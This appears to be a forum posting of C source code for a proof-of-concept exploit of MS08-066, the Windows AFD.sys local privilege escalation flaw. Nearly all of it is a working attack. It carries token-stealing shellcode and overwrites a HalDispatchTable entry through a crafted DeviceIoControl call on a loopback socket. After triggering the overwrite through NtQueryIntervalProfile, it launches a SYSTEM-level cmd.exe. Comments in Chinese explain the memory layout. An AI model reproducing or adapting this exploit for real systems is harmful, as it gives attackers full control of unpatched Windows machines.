MS08-066 AFD.sys Local Privilege Escalation Exploit (POC)

代码:

#include <Winsock2.h> #include <stdio.h> #include <windows.h> char ShellCode[]="\x90\x90\x90\x90\x90\x90\xB8\x24\xF1\xDF" "\xFF\x8B\x00\x8B\xB0\x20\x02\x00\x00\x8B" "\xC6\x8B\x80\x88\x00\x00\x00\x2D\x88\x00" "\x00\x00\x8B\x90\x84\x00\x00\x00\x83\xFA" "\x04\x75\xEA\x8B\x80\xC8\x00\x00\x00\x89" "\x86\xC8\x00\x00\x00\xC2\x08\x00"; typedef struct _THREAD_PARAMS { HANDLE hInitEvent; HANDLE hReadyEvent; } THREAD_PARAMS, *PTHREAD_PARAMS; typedef DWORD (WINAPI *PNTALLOCATE)( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN ULONG ZeroBits, IN OUT PULONG RegionSize, IN ULONG AllocationType, IN ULONG Protect ); typedef DWORD (WINAPI *PNTQUERYINTERVAL)( ULONG ProfileSource,PULONG Interval ); #pragma comment (lib, "ws2_32.lib") VOID WINAPI FooServer(LPVOID pParam) { PTHREAD_PARAMS lParams = (PTHREAD_PARAMS)pParam; SOCKET tcp_socket; SOCKET local_client; sockaddr_in localonly; sockaddr_in remote; int remoteLen = sizeof(remote); localonly.sin_family=AF_INET; localonly.sin_addr.s_addr = inet_addr("127.0.0.1"); localonly.sin_port=htons(0x8888); tcp_socket= socket( AF_INET,SOCK_STREAM, 0 ); bind(tcp_socket,(sockaddr*)&localonly,sizeof(localonly)); SetEvent(lParams->hInitEvent); listen(tcp_socket,2); local_client = accept(tcp_socket,(struct sockaddr*)&remote,&remoteLen); printf("\n\t-> Incoming connection: %s\n\n",inet_ntoa(remote.sin_addr)); WaitForSingleObject( lParams->hReadyEvent, -1 ); closesocket(local_client); closesocket(tcp_socket); return; } int main () { printf("===================================================================== \n"); printf("\t\tMS08-066 AFD.sys Local Privilege Escalation Exploit (POC) \n"); printf("\t\t Coded and Modified by :Eros412 \n"); printf("\t\t Special Thanks to : Ruben Santamarta \n"); printf("===================================================================== \n"); ULONG result; int status; PROCESS_INFORMATION pi; STARTUPINFOA stStartup; DWORD HookAddress = 0x80538ab8; //HalDispatchTable address,修改KeQueryIntervalProfile的call function 的地址 //8062cdc2 ff15bc8a5380 call dword ptr [nt!HalDispatchTable+0x4 (80538abc)] PVOID ShellCodeMemory = (PVOID)0x01000000 ; DWORD MemorySize = 0x1000; PNTALLOCATE NtAllocateVirtualMemory; PNTQUERYINTERVAL NtQueryIntervalProfile; THREAD_PARAMS lParams = {0}; char inBuff[0x40]; char outBuff[0x40]; DWORD junk ; SOCKET tcp_socket; struct sockaddr_in peer; WSADATA ws; WSAStartup(0x0202,&ws); NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle( "ntdll.dll"), "NtAllocateVirtualMemory"); NtQueryIntervalProfile = ( PNTQUERYINTERVAL ) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile"); status = NtAllocateVirtualMemory( (HANDLE)-1, &ShellCodeMemory, 0, &MemorySize, MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ); memset( ShellCodeMemory, 0x90, MemorySize ); memcpy((void*)((BYTE*)ShellCodeMemory + 0x100),ShellCode,80); //"127.0.0.1" 在内存里==0x0100007F,所以shellcode放在后面（0x01000100）就没问题了 lParams.hInitEvent = CreateEvent(0, FALSE, FALSE, 0); lParams.hReadyEvent = CreateEvent(0, FALSE, FALSE, 0); memset(inBuff,0x90,sizeof(inBuff)); memset(outBuff,0x90,sizeof(outBuff)); CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)FooServer, (LPVOID)&lParams, 0, NULL); peer.sin_family = AF_INET; peer.sin_port = htons( 0x8888 ); peer.sin_addr.s_addr = inet_addr( "127.0.0.1" ); tcp_socket = socket(AF_INET, SOCK_STREAM, 0); WaitForSingleObject(lParams.hInitEvent, -1); connect(tcp_socket, (struct sockaddr*) &peer, sizeof(sockaddr_in)); DeviceIoControl((HANDLE)tcp_socket, 0x1203f, (LPVOID)inBuff,sizeof(inBuff), (LPVOID)HookAddress,0, &junk, NULL); NtQueryIntervalProfile(3,&result); SetEvent(lParams.hReadyEvent); GetStartupInfo( &stStartup ); CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, NULL, NULL, NULL, &stStartup, &pi ); return 0; }